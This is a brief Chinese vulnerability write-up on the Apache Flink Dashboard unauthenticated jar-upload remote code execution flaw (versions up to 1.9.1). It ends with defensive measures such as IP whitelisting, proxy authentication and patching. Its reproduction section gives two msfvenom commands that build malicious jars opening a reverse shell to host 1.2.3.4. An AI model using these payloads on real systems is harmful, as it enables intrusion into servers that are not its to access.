0x00 概述

20191111，网上爆出Apache Flink上传jar包导致远程代码执行的漏洞（安全工程师Henry Chen披露）。因为Apache Flink Dashboard 默认无需认证即可访问,所以可以上传恶意jar包并触发恶意代码执行,从而getshell。

影响范围<= 1.9.1

 

0x01 漏洞重现

“apache-flink-dashboard”

1）利用MSF

msfvenom -p java/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=7766 W >poc.jar

2)利用nc

msfvenom -p java/shell_reverse_tcp lhost=1.2.3.4 lport=7766 -f jar > poc.jar

 

0x02 防御方案

1.设置防火墙策略，仅允许白名单ip访问 apache flink。

2.Web代理（如apache httpd）中增加对该服务的digest认证。

3.关注官网新版本或补丁更新。